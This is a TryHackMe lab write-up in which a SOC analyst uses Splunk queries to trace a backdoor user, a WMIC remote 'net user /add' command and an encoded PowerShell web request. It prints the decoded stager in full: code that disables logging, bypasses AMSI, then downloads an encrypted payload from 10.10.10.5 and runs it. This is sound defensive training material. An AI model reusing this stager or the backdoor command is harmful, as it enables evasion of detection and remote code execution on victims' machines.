Investigating with Splunk tryhackme writeup
Hello You, the scenario is that Johny has observed some anomalous behaviours in the logs of a few Windows machines. It looks like the adversary has access to some of these machines and successfully created some backdoors. His manager has asked him to pull those logs from suspected hosts and ingest them into Splunk for quick investigation. Our task as SOC analyst is to examine the logs and identify the anomalies.
Let’s get going, here is the room link.
Firstly we need to get the source of the logs that we want to work on
here you can use the source and choose the logs source you need, or from the Data Summary in the how to search section.
- Remember to set the time filter to
All Time
1. How many events were collected and Ingested in the index main?
You can see that the number of hits (events) is 12256
2. On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?
Here I searched for the Windows event ID for creating a user
based on that info, I crafted this query to search for the event ID 4720
source="splunk_challenge1.json" EventID=4720
Here you can see the name of the new user is A1berto
Note:
Subjectis typically the entity or element that initiates an action or operation, and hereJamesis the subject :3
3. On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?
A register value changed so I searched for the sysmon event IDrelated to that, you can check this link for more info.
Based on the same host from the question I put the new username A1berto in the search query, and there was only one hit.
source="splunk_challenge1.json" EventID=13 "A1berto"
The full path of the register key is: HKLM\SAM\SAM\Domains\Account\Users\Names\A1berto\
4. Examine the logs and identify the user that the adversary was trying to impersonate.
Here it is obvious that the attacks is trying to impersonate Alberto
5. What is the command used to add a backdoor user from a remote computer?
I searched for Events IDs for remotely executed commands and I found this question on one of the communities asking about the same thing, they led us to event ID 4688. Notice that they are saying backdoor user from a remote computer that’s why I searched for commands to create a user in Windows and it was net user ... so I added that to the search which helped me reduce the number of events, This is the command
"C:\windows\System32\Wbem\WMIC.exe" /node:WORKSTATION6 process call create "net user /add A1berto paw0rd1"this is the query I’ve wrote
6. How many times was the login attempt from the backdoor user observed during the investigation?
The Event id 4624 is about successful logins, and when I searched that event ID with the username A1berto there were no hits.
so it’s 0
7. What is the name of the infected host on which suspicious Powershell commands were executed?
I went back to the query in question five and searched for the Hostname
it is James.browne
8. PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?
Here I used the event id 4104 and 4103 and this was the result
74 events
9. An encoded Powershell script from the infected host initiated a web request. What is the full URL?
when I executed the previous query I noticed a wired powershell command being executed and there was a base64 value as one of its parameter
so I took it and encoded it and this was the result after some cleaning
IF($PSVerSIonTabLe.PSVErSION.MaJOR -Ge 3){$11BD8=[reF].ASseMbly.GetTyPE('System.Management.Automation.Utils')."GETFIe`ld"('cachedGroupPolicySettings','N'+'onPublic,Static');
IF($11Bd8){$A18E1=$11BD8.GetVaLUE($nUlL);
If($A18e1['ScriptB'+'lockLogging']){$A18e1['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;
$a18e1['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[CoLlectiONS.GeNEriC.DIcTiOnARY[StrING,SysTEm.OBJEct]]::neW();
$vAL.AdD('EnableScriptB'+'lockLogging',0);
$VAL.Add('EnableScriptBlockInvocationLogging',0);
$a18e1['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$VAl}ELsE{[ScRipTBlOCK]."GeTFIE`Ld"('signatures','N'+'onPublic,Static').SEtVAlUe($NuLL,(NEw-OBjeCt CoLLEcTiONS.GeNerIc.HAsHSet[STring]))}$ReF=[Ref].AsSEMBly.GeTTyPe('System.Management.Automation.Amsi'+'Utils');
$Ref.GEtFIeLd('amsiInitF'+'ailed','NonPublic,Static').SEtVALue($NULl,$tRUe);
};
[SYStEm.NeT.ServICePoINtMAnAgER]::EXpeCT100ContINue=0;
$7a6eD=NeW-OBJeCT SYsteM.Net.WEbClIeNT;
$u='Mozilla/5.0 (Windows NT 6.1;
WOW64;
Trident/7.0;
rv:11.0) like Gecko';
$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));
$t='/news.php';
$7A6Ed.HEAders.Add('User-Agent',$u);
$7a6Ed.PROxY=[SySTEm.NET.WebREQUesT]::DefAULtWeBPRoXY;
$7a6ED.PROXY.CRedEntIAlS = [SYsTEM.NEt.CRedEnTIaLCachE]::DEFaUltNETwoRKCrEdeNtIALS;
$Script:Proxy = $7a6ed.Proxy;
$K=[SysteM.TeXT.EnCoDIng]::ASCII.GeTByTeS('qm.@)5y?XxuSA-=VD467*|OLWB~rn8^I');
$R={$D,$K=$Args;
$S=0..255;
0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnt])%256;
$S[$_],$S[$J]=$S[$J],$S[$_]};
$D|%{$I=($I+1)%256;
$H=($H+$S[$I])%256;
$S[$I],$S[$H]=$S[$H],$S[$I];
$_-BxoR$S[($S[$I]+$S[$H])%256]}};
$7A6ed.HeADers.Add("Cookie","KuUzuid=VmeKV5dekg9y7k/tlFFA8b2AaIs=");
$Data=$7a6ed.DowNLoadDatA($SEr+$t);
$iv=$DATA[0..3];
$DaTA=$dATA[4..$DaTA.LEnGtH];
-JOiN[Char[]](& $R $dAta ($IV+$K))|IEXyou can see in this line
$ser=$([TeXT.ENCodiNG]::UnicodE.GetStriNG([CoNVeRT]::FroMBASe64StRInG('aAB0AHQAcAA6AC8ALwAxADAALgAxADAALgAxADAALgA1AA==')));that it is decoding another value, which turned out to be the url and when you read the rest of the code you will understand that it is requesting the $res + $t which has the value /news.php
The full defang url would be hxxp[://]10[.]10[.]10[.]5/news[.]php
That’s it, Thanks for reading.
